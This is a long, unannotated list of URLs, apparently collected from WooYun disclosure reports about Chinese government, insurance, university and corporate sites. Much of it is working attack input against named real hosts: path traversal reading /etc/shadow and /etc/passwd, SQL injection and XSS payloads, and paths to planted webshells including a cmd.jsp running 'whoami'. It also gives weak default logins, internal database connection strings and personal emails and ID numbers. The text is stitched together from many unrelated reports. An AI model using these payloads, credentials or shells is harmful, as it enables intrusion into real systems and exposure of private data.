http://qdbank.smeqd.gov.cn/ http://114.251.156.71:7001/console/ http://114.251.156.71:7001/ http://shenbao.sms.huhutv.com.cn:8089/ http://114.251.156.71:8080/zncj/ http://114.251.156.71:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@172.16.32.8:1521/dthrep http://www.okdai.com/ http://www.qef.org.hk/sc_chi/whatsnew/sharing_sessions_seminars.php?id=309 http://218.65.95.160:8081/aas/ http://59.57.37.85:68/index.asp http://oa.jzjt.com:8084/jzjt/ http://scc.ustc.edu.cn/ganglia/ http://oa.cstm.org.cn http://125.64.61.106/index.php?action=user&do=login http://cmnhr.minmetals.com.cn/index.jsp五矿有色成员企业年度干部考评系统用户名登录处存在SQL注入 http://cmnhr.minmetals.com.cn/login.jsp dv.56.com/hongren/?do=AjaxAdsData&order=11&pn=1&ps=12&type=12 http://www.anxin.com/user/login.html?ru=/usercenter/default.aspx inurl:www.east.net/user/showUserSuccess http://www.east.net/user/showUserSuccess?email=caiym@tsinghua.org.cn http://www.east.net/user/showUserSuccess?email=caiym@tsinghua.org.cn http://www.east.net/user/showUserSuccess?email=466196038@qq.com http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=466196038%40qq.com http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=caiym@tsinghua.org.cn http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=luguohe@east.net http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=support@east.net http://www.east.net/user/showUserSuccess?email=admin@cmmrchina.com http://www.east.net/user/userForgetPassword?code=b0f47076c2df6d4d44296952099ce6ab&email=admin@cmmrchina.com http://yz.gxzj.com.cn/mini_print.aspx http://222.133.41.254:8080/DZDS/Out/login.html http://p.enshi.gov.cn/?act=list&cid=1*&.html http://sqlmap.org http://pay.tongji.edu.cn/idc/ http://202.120.188.52/is2/JspSpyJDK5.jsp http://isso.kmyz.edu.cn/mainAction.action dir:/opt/ms/apache-tomcat/webapps/ROOT/ http://allthingshair.youku.com/ http://www.szkuniu.com/uploads/article_source/201505311402314e.php http://wooyun.org/bugs/wooyun-2015-0117304 http://easshow.kingdee.com:7896/portal/logoImgServlet?language=ch&dataCenter=&insId=insId&type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00 http://www.china-designer.com/sub/newsdetail.aspx?cat=3&nid=2013112214135454 http://180.169.34.35/Index.xhtml http://180.169.34.35/console http://180.169.34.35/cK/foot.jsp http://www1.nuc.edu.cn/gzcadmin/projectquery/index.php/Home/Index/detail?project_id=590 http://mail.yixia.com/ http://belsexp.com/express/account/login.php http://jiuye.caa.edu.cn/index?jession=3568897ea065f5ae93f62272899ab4e8 http://123.233.240.70:9080/qsksyy/ywblcx.do http://123.233.240.70:9080/qsksyy/ywblcx.do http://www.dygajj.gov.cn:9080/qsksyy/ywblcx.do http://www.dygajj.gov.cn:9080/qsksyy/ywblcx.do http://cgs.qdpolice.gov.cn:9080/qsksyy/ywblcx.do http://cgs.qdpolice.gov.cn:9080/qsksyy/ywblcx.do http://218.59.228.162:9080/qsksyy/ywblcx.do http://218.59.228.162:9080/qsksyy/ywblcx.do http://www.wfcgs.com:9080/qsksyy/ywblcx.do http://www.wfcgs.com:9080/qsksyy/ywblcx.do http://60.211.179.22:9080/qsksyy/ywblcx.do http://60.211.179.22:9080/qsksyy/ywblcx.do http://60.213.185.51:9080/qsksyy/ywblcx.do http://60.213.185.51:9080/qsksyy/ywblcx.do http://m.91jlb.com/mobile/agent/shop.html?id=161&tpl=new&area=0&order=0 http://www.kaifu.com/ http://passport.tianya.cn/topapi/newActiveUsers.do?size=54&var= http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var= http://passport.tianya.cn/topapi/newActiveUsers.do?size=55&var=%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://wealth.sinosig.com/invoker/JMXInvokerServlet http://album.kuwo.cn/ ftp://202.114.32.219 http://p2p.ips.com.cn/creditmertestweb/index.aspx http://p2p.ips.com.cn/creditmertestweb/registerguarantor.aspx http://p2p.ips.com.cn/creditmertestweb/autoSigning.aspx http://p2p.ips.com.cn/creditmertestweb/repaymentsigning.aspx http://p2p.ips.com.cn/creditmertestweb/recharge.aspx http://p2p.ips.com.cn/creditmertestweb/guaranteefreeze2.aspx http://p2p.ips.com.cn/creditmertestweb/guaranteefreeze2.aspx http://p2p.ips.com.cn/creditmertestweb/registerguarantor.aspx http://p2p.ips.com.cn/creditmertestweb/registercretansfer.aspx http://p2p.ips.com.cn/creditmertestweb/RegisterCretansfer.aspx http://p2p.ips.com.cn/creditmertestweb/CreateIpsAccount.aspx http://www.huomaotv.com/index.php?a=help&c=site&type=1&id=27 http://mail.marstv.com http://mail.huomaotv.com的连接方式 http://www.maihaome.com/mobile/index.php?m=default&c=category&a=index&id=2556&brand=0&price_min=0&price_max=0&filter_attr=0&sort=goods_id&order=DESC&keywords=%E8%89%BE%E6%8B%89 http://www.chaojibiaoge.com/index.php/Oa/Project/getDiscussionContent/content_id/2499 http://www.chaojibiaoge.com/index.php/Oa/Project/getDiscussionContent/content_id/2499%20and%201=2%20union%20select%201,2,3,4 http://www.chaojibiaoge.com/index.php/Oa/Project/getDiscussionContent/content_id/2499%20and%201=2%20union%20SELECT%201,2,3,4 ftp://122.114.50.126 ftp://erp.ilanhai.cn/ ftp://122.114.50.126/weixinoa_ilanhai_cn/Web.config http://**.**.**/index.php/System/Model/getOneRecord/keyfield/name/id/admin/table/sys_user/modelid/sys_userinfo/ http://share.tataufo.com/static/js/manager.js http://share.tataufo.com/users?page=5&verify=-2&university=%E6%9D%AD%E5%B7%9E%E7%94%B5%E5%AD%90%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6&province=%E6%B5%99%E6%B1%9F&sex=0&sort=0&class=1 http://www.chaojibiaoge.com/index.php/Project/main http://www.sxqx.net/突然心血来潮想注入下,就拿起利器玩了起来,接着就看到了注入点。 http://www.sxqx.net:8080/yiDetails.aspx?id=20150717200052 http://www.sxqx.net:8080/zcdl/login.asp http://www.sxqx.net:8000/yqptlogin.aspx http://www.sxqx.net:8000/xzptlogin.aspx http://120.36.152.6:8081/.svn/entries http://120.36.152.6:8083/.svn/entries http://iedm.nawang.cn/examples/servlets/servlet/SessionExample http://mboxspace.kuwo.cn/ucm/mb/GetLeboByLab?labName=%E7%BB%8F%E5%85%B8 http://**.**.**.**/web/WebSearchDsp.jsp?key=1 http://**.**.**.**/web/WebSearchDsp.jsp?key=1 http://**.**.**.**//web/WebSearchDsp.jsp?key=1 http://**.**.**.**//web/WebSearchDsp.jsp?key=1 http://202.202.43.15/ http://202.202.43.15/report.php?term=28 http://busi.epicc.com.cn/merchant/info/info/1000771/edit http://busi.epicc.com.cn/merchant/info/info/1000771/edit http://busi.epicc.com.cn/merchant/info/info/1000773/edit http://busi.epicc.com.cn/merchant/info/info/1000775/edit http://busi.epicc.com.cn/merchant/info/info/1000777/edit http://busi.epicc.com.cn/merchant/info/info/1000779/edit http://www.17ok.com/ssgsgg/index.php?code=1 http://www.fumu.com/.svn/entries http://**.**.**.**/HSComm/logincode.aspx http://**.**.**.**/HSComm/logincode.aspx http://**.**.**.**/Hscomm/logincode.aspx http://**.**.**.**/hscomm/LoginCode.aspx http://**.**.**.**/hscomm/logincode.aspx http://www.xtrb.cn/ http://60.6.234.84/WebRegister/index.aspx http://efds.nuctech.com/efds/servlet/loginservlet http://pan.baidu.com/s/1i39zdjB http://222.73.192.46:8081 admin:admin http://www.kdnet.net/ http://**.**.**.**/headmaster/HeadmasterLogin.aspx http://**.**.**.**/headmaster/HeadmasterLogin.aspx http://loveshop.ccf.org.tw/oper/main.htm http://loveshop.ccf.org.tw/oper/main.htm http://www.czjt.gov.cn:81/aftersound/show.php?txtid=6812 http://www.nj12320.org/ http://www.nj12320.org/njres/main.do?userCenterType=yyjlxq&reservcode=22923025 http://www.nj12320.org/njres/main.do?userCenterType=yyjlxq&reservcode=22923026 http://www.nj12320.org/njres/main.do?userCenterType=yyjlxq&reservcode=22923027 http://www.nj12320.org/njres/main.do?userCenterType=yyjlxq&reservcode=22923028 http://121.40.195.32/ http://www.aizhenghun.com http://www.aizhenghun.com/register_Upd.asp https://ask.tuniu.com/sql/.svn/entries https://ask.tuniu.com/conf/.svn/entries http://www.zhunbai.com/ http://www.zhunbai.com/user/info/do/myinfo.html https://train.tuniu.com/ https://train.tuniu.com/protected/runtime/application.log http://train.tuniu.com/protected/runtime/application.log http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=0&subject2=709&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=0&subject2=709&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=0&subject2=709&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=0&subject2=709&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**/resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**//resource/jpk/search.jsp?coursetype=0&applyyear=0&university=&subject1=1&subject2=0&name= http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**/resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://**.**.**.**//resource/jpk/search.jsp?orderfield=university http://61.178.60.188:8088/ecp/index.jsp http://119.6.119.51/index.php?act=exchange&op=exchange&vg_id=89 http://www.ict.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.ict.edu.cn/api.php?op=phpsso&code=43deUgQABwkDBFUFBFNUAgAEAwUOCVlUUFEBV1JUW0BRWFpfR0lZVVxTDFsSFF5TCRdBAldUQUcWAgIXVk1VWBAGGAFbXlRYRxxCSxNNQkRRQklKEBxQG0U http://211.160.167.201/在这个网站的右上角企业入口 http://211.160.167.201:8080/admin/evispBackManage/default.jsp http://219.144.186.149/login.aspx http://qis.midea.com.cn:80/default.aspx http://hqb.htdata.cn/ http://tool.lu/coderunner/,支持php,C,C++,python,Go,Java,Nodejs,Lua代码的在线运行。 http://www.rssvgp.com/rssvgp.rar http://www.dfyuan.com/news_detail.php?id=55 http://www.dfyuan.com/dfxk/admin.php/Index/index http://www.dfyuan.com/dffg/admin.php/Index/index http://www.dfyuan.com/pk360/admin.php/Index/index http://www.dfyuan.com/run360/admin.php/Index/index http://www.1937china.com:80/ http://www.19mcc.com.cn/company.php?id=6 http://www.19mcc.com.cn/admin/admin_login.php http://www.bynrjt.gov.cn/Special.asp?id=3 http://61.178.60.188:8088/ecp/sys/sys-system!login.do http://211.157.110.44/integrator_channel/WXServiceNoServletdoPost http://123.234.41.28//ashx/check_login.ashx?id= http://ptpm.mohrss.gov.cn:8080/ http://122.224.216.245:8090/ http://220.181.20.13/zabbix/ http://bgxt.guangken.com.cn:9000/projectweb/login.do http://u.4399.com/user/info http://u.4399.com http://180.168.145.129/GfPay/ http://www.2bu.cn/index.php?c=article&id=347 http://219.143.252.247:8083/ http://my.51.com http://sunzhaopin.sinosig.com/ygbxHr/ http://sunzhaopin.sinosig.com/ygbxHr/UserActionDef!ModifyPW.action http://180.168.29.82/webstart/login.jsp http://180.168.29.82/is/index.jsp m.dixintong.com/shop/addressMgr.aspx?cid=92&delivery=1&storeId=-1&storeName=&paymode=1&userId=38693&pid=0&uid=0 http://m.dixintong.com/shop/addAddress.aspx?cid=92&delivery=1&storeId=-1&storeName=&paymode=1&userId=38693&pid=0&uid=-1¢er=&did=0&source= http://online.suning.com http://112.91.120.145/ http://222.223.31.86/login.action http://222.223.31.46/login.action http://222.223.31.86/wallpapers/1437277933080_dir/1437277933080_file.jsp jdbc:sqlserver://IQLI*******:1433;databaseName=***** http://online.suning.com http://city.vivo.com.cn/administrator/ http://api.m.suning.com/logistics/private/logisticsQuery_00025341434501__.do http://api.m.suning.com/logistics/private/logisticsQuery_00025341834201__.do http://api.m.suning.com/logistics/private/logisticsQuery_00025341876201__.do http://**.**.**.**/jydw_Action.do?TASK=select_submit_web http://**.**.**.**:8080/jydw_Action.do?TASK=select_submit_web inurl:http://www.greatlife.cn/card/cardInfoQuery.do?prtno= http://www.greatlife.cn/card/cardInfoQuery.do?prtno=7001040001750288&insuredIdno=410381201405280138 http://www.greatlife.cn/card/cardInfoQuery.do?prtno=7001040001788288&insuredIdno=13028320080101008X http://www.greatlife.cn/card/cardInfoQuery.do http://www.greatlife.cn/card/cardInfoQuery.do?prtno=7001040001788288&insuredIdno=13028320080101008X http://www.pzhaic.gov.cn:7010/bszn!detail.action http://www.pzhaic.gov.cn:7010/console是weblogic,而且用weblogic/weblogic顺利登陆 www.pzhaic.gov.cn,但是建立用户却登陆不上,肯定是端口转发到另外一台机器了 www.pzhaic.gov.cn也成功了,对应内网172.27.168.25 http://www.pzhaic.gov.cn:7010/key/1.jsp http://career-whrc.huawei.com:80/pages/home.php http://admin.qu114.com/ http://admin.qu114.com http://travel315.people.com.cn/admin/login.php http://www.haida.cn/ http://www.haida.cn/HDBusiPlt/ http://www.haida.cn/HDBusiPlt/UploadDir/OADownCenter/2015718232427868/aspxspy.aspx http://220.179.54.6:8081/szsj/login/login.do http://www.gewara.com/activity/ajax/sns/replyComment.xhtml http://wandafilm.com/ http://**.**.**/ads/ http://www.spg.com.cn/info_pagelist.jsp?page=&xwid=22728&lmmc=dd_gsxw http://218.1.102.99:7001/console http://220.178.116.78:7001/defaultroot/public/jsp/singleupload.jsp?path=desktop&mode=add&hiddenName=unitImgSaveName&visualName=unitImgName http://220.178.116.78:7001/defaultroot/upload/desktop/2015051610314998648924973.jsp http://222.66.163.38/ http://home.9158.com/web.rar http://180.169.84.55/indexlis.jsp http://180.169.84.55/is2/chopper.jsp http://tengbang.feiren.com:80/ https://mec.cmfchina.com/ http://**.**.**.**:81/ctrans/ctrans.asp http://**.**.**.**/ctrans/ctrans.asp http://**.**.**.**/ctrans/ctrans.asp http://**.**.**.**//ctrans/ctrans.asp http://61.155.23.238:80815 http://61.155.23.238:8086 http://61.155.23.238:8080 http://61.155.23.238:8083 http://61.155.23.238:8084 http://61.155.23.238:8202/ http://61.155.23.238:8087 http://61.155.23.238:8088 http://61.155.23.238:8201/ http://61.155.23.238:8081 http://61.155.23.238:8082 http://www.gffunds.com.cn/etfpcf/etf_pcf_qzny_txt.jsp?fundcode=159945&tdate=2015-07-17 http://wxtest.efunds.com.cn:7777/console/ http://wxtest.efunds.com.cn:8899/console/ http://wxtest.efunds.com.cn:7777/is/cmd.jsp?pwd=023&cmd=whoami http://180.96.63.19:8684/ebus/security/auth/login.do http://www.yamaha.com.cn/news_events/list_cpzx.html?category=19 IP:103.231.145.27 http://s.wanda.cn http://s.wanda.cn/MergeToPay/20150719/xxx.aspx,20150719目录不存在,这算是修复了么 http://124.238.219.61/system/index.php/Wanda/Floor/index/token/ http://60.10.61.161/,这个完全不知道什么,每天都有那么几条数据,你们正常的业务?暴漏了个内网ip:http://10.77.131.13/?actionType=equipmentid http://www.ccsa.org.cn/organization/intro.php?org=ASTAP http://www.ccsa.org.cn/organization/index.php3?category_id=3 http://www.ccsa.org.cn/tc/meeting.php?meeting_id=5163 http://www.ccsa.org.cn/peixun/pxresult.php3?VTI-GROUP=0&name=1&term=1&unit=&start_date=&dead_date=&cert_start_date=&cert_dead_date=&B1=1 http://www.bsoft.com.cn/ http://www.yileyoo.com/ http://www.yileyoo.com/news_detail%22%20AND%203*2*1%3d6%20AND%20%22000PpsT%22%3d%22000PpsT/117.html http://www.eims.hc360.com/jsp/cn/manage/groupdisplay.jsp?err=invalid%20param http://www.eims.hc360.com/console是出不来登录界面的,需要换成ip来登录 http://118.194.32.146/console http://jp.eims.hc360.com/ http://us.eims.hc360.com/ http://e-eyes.huicong.com/ ttp://wooyun.org/bugs/wooyun-2015-0127352通过爆破OA系统可获得完整员工邮箱地址。 http://mail.cstm.org.cn/coremail/同样可以爆破获得敏感信息,可获取完整组织架构、人员信息,发送接收邮件等敏感操作 http://221.239.121.25:8081//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.ipospal.com/ http://140.207.82.206:5001/pm/logout.do http://140.207.82.206:5001/cK/foot.jsp http://wangxiao.nbclz.com/admin.php http://www.zxd.com/activity/selectDwActiveList?createTimeParam=¤tPage=2&pageSize=6 www.xgrb.cn,对应219.138.202.5 http://219.138.202.14:7001/newsedit/batman/Login.jsp http://219.138.202.14:7001/console http://219.138.202.14:7001/key/a.jsp http://online.suning.com/console/Service/commissionGoods/pageCommissionGoods http://piaofang.maoyan.com/utils/proxy.shtml?source=https://www.baidu.com/s?wd=ip&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=monline_5_dg&rsv_enter=1&rsv_sug3=1&rsv_sug1=1&rsv_sug2=0&inputT=865&rsv_sug4=865 http://www.cbeis.zju.edu.cn/zjswyxgc/readtitle.php?id_xuehui=55 http://**.**.**.**/bugs/wooyun-2015-0113060而发 http://**.**.**.**/webschool/News/ClassNews/class_link.jsp?schoolId=1&classId=x201405&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=10001906&classId=Y201401&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=10001495&classId=x201406&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=1&classId=x201404&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=1 http://**.**.**.**/News/ClassNews/class_link.jsp?schoolId=10001500&classId=&typeId=clas0302 http://**.**.**.**/News/ClassNews/class_bjjj.jsp?classId=x201205 http://**.**.**.**/News/ClassNews/class_bjjj.jsp?classId=x201405 http://**.**.**.**/News/ClassNews/class_bjjj.jsp?classId=Y201202 http://**.**.**.**/webschool/News/ClassNews/class_bjjj.jsp?classId=x201408 http://**.**.**.**/News/ClassNews/class_user.jsp?classId=x201205 http://**.**.**.**/webschool/News/ClassNews/class_user.jsp?classId=x201404 http://**.**.**.**/News/ClassNews/class_user.jsp?classId=E201402 http://**.**.**.**/News/ClassNews/class_user.jsp?classId=x201001 http://**.**.**.**/News/ClassNews/class_user.jsp?classId=x201213 http://**.**.**.**/webschool/News/ClassNews/class_list.jsp?classId=x201408&typeId=clas04 http://**.**.**.**/News/ClassNews/class_list.jsp?classId=x201406&typeId=clas02 http://**.**.**.**/News/ClassNews/class_list.jsp?classId=x201202&typeId=clas0301 http://**.**.**.**/News/ClassNews/class_list.jsp?classId=Y201302&typeId=clas0104 http://**.**.**.**/News/ClassNews/class_list.jsp?classId=x200909&typeId=clas0304 http://**.**.**.**/webschool/News/ClassNews/news_list.jsp?typeId=clas0104 http://**.**.**.**/News/ClassNews/news_list.jsp?typeId=clas01 http://**.**.**.**/News/ClassNews/news_list.jsp?typeId=clas01 http://**.**.**.**/News/ClassNews/news_list.jsp?typeId=clas0201 http://**.**.**.**/News/News/ClassNews/news_list.jsp?typeId=clas01 http://online.suning.com/console/Service/monitor/pageGroup http://bang.liba.com/decorate/delicacy/album/home?style=0 http://www.hnfyxh.cn/framework/ua http://hl.pay.joy.cn/searchresult.aspx?keyword= http://www.tophr.net/magazine/magazine_index.asp?id=699 http://common.sc.sina.com.cn/vote/list.php?callback=?&limit=100&p=1&pid=8956&sort=1&updown=asc site:super.lvmama.com http://baolai.hz.letv.com/php/videonum.php?callback=?&id= http://www.trjcn.com/login/forget.html http://**.**.**/login/forget.htmltype=mobile&code=77556660d3df821a2f1d2ace043ed2f78fdb92 http://sjb.licaike.hexun.com/.svn/entries https://e.cmbchina.com/CmbBank_EHome/UI/RegUser/Public/ForgetPassword.aspx http://newoa.phfund.com.cn/ http://61.144.227.35/main/gb/adminhall/result1.jsp http://http://61.144.227.35/main/gb/adminhall/szzwresult.jsp www.rinnai.com.cn/support/guestbook/ www.rinnai.com.cn/admincp/passport/login/ http://bjjj.baoji.gov.cn/web/jgdt/Info.aspx?newid=3601&id=104 http://124.202.134.41:8080/LMS/flex/FTLogin.html# https://zh.essence.com.cn/kess/SMSSendServlet.ka http://by.486g.com/loginAction!initTrueGuest.action http://**.**.**.**/Web/KnowledgePoints.aspx?PLTagID=3 http://**.**.**.**:8090/wsbgt/Web/KnowledgePoints.aspx?PLTagID=3 http://**.**.**.**:106/adksvod/web/KnowledgePoints.aspx?PLTagID=3 http://mail.sd-si.cn/ http://www.zhenfund.com/Home/Index/category/id/4 http://email.vips100.com/edm/edms/editor.php?id=-1 http://www.finawin.cn/Website/plan/plancase_list.aspx?casetype=1 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/online&page=/B2BRegister.do&actionType=saveinit http://www.civa.cc/forum.php?mod=alliance&do=memberunit&ac=detail&id=497%20and%201=1(贵州省黔剧院) http://www.civa.cc/forum.php?mod=alliance&do=memberunit&ac=detail&id=876 http://www.civa.cc/forum.php?mod=alliance&do=memberunit&ac=detail&id=878 http://www.civa.cc/forum.php?mod=alliance&do=memberunit&ac=detail&id=880 http://www.civa.cc/forum.php?mod=alliance&do=memberunit https://mail.phfund.com.cn/owa/ http://www.lntl.hrss.gov.cn:8030/console/ http://www.lntl.hrss.gov.cn:8030/jmxroot/jmxroot.jsp jdbc:oracle:thin:@172.17.0.1:1521:orcl http://wooyun.org/bugs/wooyun-2010-0117740 http://www.lepumedical.com/ http://www.lepumedical.com/admin/login.php www.lepumedical.com/uploads/file/20150720/201507200107175e1.php http://www.cartel.tcl.com/carfriweb/friend/login?downprepath=http%3A%2F%2Ftclcar.com%2Fmgresource%2Fimg&deskpath=http%3A%2F%2Fwww.cartel.tcl.com%2Fcarfriweb&paperFile=chelian&validataCodeBoolean=true&path=http%3A%2F%2Fwww.cartel.tcl.com%2Fhttpresource%2Fposrecord%2F&music_path=http%3A%2F%2Fwww.cartel.tcl.com%2Fhttpresource%2Fposrecord%2F&managerpath=http%3A%2F%2Fwww.cartel.tcl.com%2Fcwebresource&MapKey=http%3A%2F%2Fapp.mapabc.com%2Fapis%3Ft%3Djavascriptmap%26v%3D3.1.1%26key%3Da8c528ab2e94f161571b6c0a511803656208a2ad86c1cf706a72076735e0d4987321b6cb025ef283&restype=1 http://221.214.179.228:5000/ http://61.150.109.61:81/ http://124.129.7.215/ http://124.129.7.216/ https://trade.jyvpfund.com/console/ https://trade.jyvpfund.com/jmxroot/jmxroot.jsp jdbc:oracle:thin:@10.***** http://account.aigame100.com/PwdFind/LoginName.aspx http://v.gffunds.com.cn:80/ https://ihome.cofco.com/dana-na/auth/url_default/welcome.cgi,中粮集团内网,账号lxia存在弱密码123456,里面包含OA系统、中粮快讯、公告通知、中粮通讯录等等敏感信息。 http://c3.cofco.com/index.php,中粮营养健康研究院知识门户,里面又包括不少系统,还能看到员工以及专家详细资料(照片、电话、邮箱等)。 http://124.234.102.6:7001/console/ http://124.234.102.6:7001/jmxroot/jmxroot.jsp is:ybsimisbkl jdbc:oracle:thin:@172.16.0.200:1521/ybzhouggfw http://180.169.84.55 http://180.169.84.54 http://59.151.39.85 http://59.151.39.93 http://180.169.84.48/ui/ http://city2011.house.sina.com.cn/?uid=1&act=myphoto&ctrl=gallery http://www.huway.com/user_cardmanage?id=5 http://qz.yundasys.com:7777/amb/login.php http://zfb.yundasys.com/wd_yfk/login.php http://nbsw.yundasys.com:81/dh/w/login.php http://auth.yundasys.com:11372/ydauth/login.html http://route.yundasys.com:11362/route/login.html http://car.yundasys.com:81/yd_khd/login.php https://github.com/qyer-dc/wz-api/blob/adab27929bfc43a5ee2946a635d4cbe159630c0e/z_app/src/applicationContext-mail.xml https://member.hexindai.com/password/verifyusername.html http://chat.rising.com.cn/webcsc/ens/ashx/GetCity.ashx?pid=9 http://www.xiji.com/passport-lost.html http://**.**.**.**/vj/Employer/Register.aspx?guid= http://**.**.**.**/Employer/Register.aspx?guid= http://**.**.**.**/vj/Employer/Register.aspx?guid= http://**.**.**.**/Employer/Register.aspx?guid= http://**.**.**.**/Employer/Register.aspx?guid= http://**.**.**.**:8090/vj/Employer/Register.aspx?guid= http://www.xiji.com/cart-shipping_confirm.html http://os.open.com.cn/ http://115.182.41.187/Home/Login http://m.360bzl.com/category.php?id=1&sort=goods_id&page=2 http://www.360bzl.com/bzl_shopadmin/index.php https://github.com/druphliu/oauth/blob/bbb48b1a689d0cf5a4613944671d7e2d6e085638/protected/extensions/Utils.php http://**.**.**.**/bugs/wooyun-2010-0101555 http://UCG.dooland.com/ http://zqb.dooland.com/ http://zgdy.dooland.com/ http://zgzk.dooland.com/ http://zfsd.dooland.com/ http://zito.dooland.com/ http://zxyxbook.dooland.com/ http://zongyiweekly.dooland.com/ http://UCG.dooland.com/ http://sqlmap.org http://58.213.148.10:81/login.aspx http://58.213.148.10:81/apply/Base_Info_add.aspx http://**.**.**.** ttp://www.jhjyjt.cn/jhjyjt.cn.rar http://www.jiumei.com/account/user_updateUser.dhtml?m=&name=%25u6211%25u6211%25u6211&homeAddress=%25u5317%25u4EAC%25u4E1C%25u57CE%25u533A&email=test_cumt%40126.com&sex=1&provincial=001002&city=001002001&county=null&zipcode=111111&mobile=13611111111&homePhone=5632365 http://www.youxigu.com/www.youxigu.com.tar.gz http://uc.tuanche.com http://uc.tuanche.com/account/modifyInfo http://price.ziroom.com.cn/?_p=../../../../../../../../../../etc/passwd%00.jpg http://140.206.53.222:7001/console/ http://140.206.53.222:7001/jmxroot/jmxroot.jsp jdbc:oracle:thin:@128.236.163.248:1521/testdb01 jdbc:oracle:thin:@128.236.163.248:1521/testdb01 jdbc:oracle:thin:@128.236.163.248:1521/testdb01 jdbc:oracle:thin:@128.236.163.248:1521/testdb01 jdbc:oracle:thin:@128.236.163.248:1521/testdb01 http://218.22.1.68:7001/netrep/login.jsp http://218.22.1.68:7001/console/login/LoginForm.jsp http://218.22.1.68:7001/JspSpyJDK5/JspSpyJDK5.jsp http://218.22.1.68:7001/ceshi/ http://106.37.172.5:8080/entrance.do http://124.193.148.50:8012/Web/Page/Account/Login.aspx http://**.**.**.**/searchlist.aspx?class=3&key=1 http://**.**.**.**/searchlist.aspx?class=3&key=1 http://**.**.**.**/searchlist.aspx?class=3&key=1 http://**.**.**.**/searchlist.aspx?class=3&key=1 http://**.**.**.**/IndexAskq.aspx/searchlist.aspx?class=3&key=1 http://**.**.**.**/p-717667098.html http://**.**.**.**/bugs/wooyun-2010-044787 http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.**/general/ERP/LOGIN/ http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.**:81/general/ERP/LOGIN/index.php http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.**/general/ERP/LOGIN/index.php http://**.**.**.** http://110.90.120.49:8080/etrading/ http://www.picooc.com http://www.picooc.com/index.php?s=/home/address/save.html http://oa.phsy.com.cn:8080/defaultroot/ http://61.172.251.231:8161/admin/ http://**.**.**/console/ http://www.bssgjj.com/jmxroot/jmxroot.jsp http://www.xiangguo.com http://www.xiangguo.com/customer/address http://space.fang.com/?c=setting&a=face。 http://hrm.cmge.com/ http://licensing.hp.com/slm/orangePortal/downloadFile?filename=WEB-INF/web.xml http://licensing.hp.com/slm/orangePortal/downloadFile?filename=index.jsp http://webware.hp.com/slm/orangePortal/downloadFile?filename=WEB-INF/web.xml http://webware.hp.com/slm/orangePortal/downloadFile?filename=index.jsp http://bi.diandao.org/login http://bbs.ehang.com/uc_server.zip http://aboutus.cits.cn/cits/admin/index.jsp http://wooyun.org/bugs/wooyun-2015-0122816 http://wooyun.org/bugs/wooyun-2015-0122766 http://hi.haidilao.com/exchanges/inMobileEx.action?customerId=0100000059101847 http://218.241.156.50/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://broker.guohualife.com/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://180.169.84.48/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://180.169.84.55/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://59.151.39.85/pre/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts http://epos.jxlife.com.cn/ter/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://gdxt.hxlife.com/ui/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://218.241.156.50/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/hosts 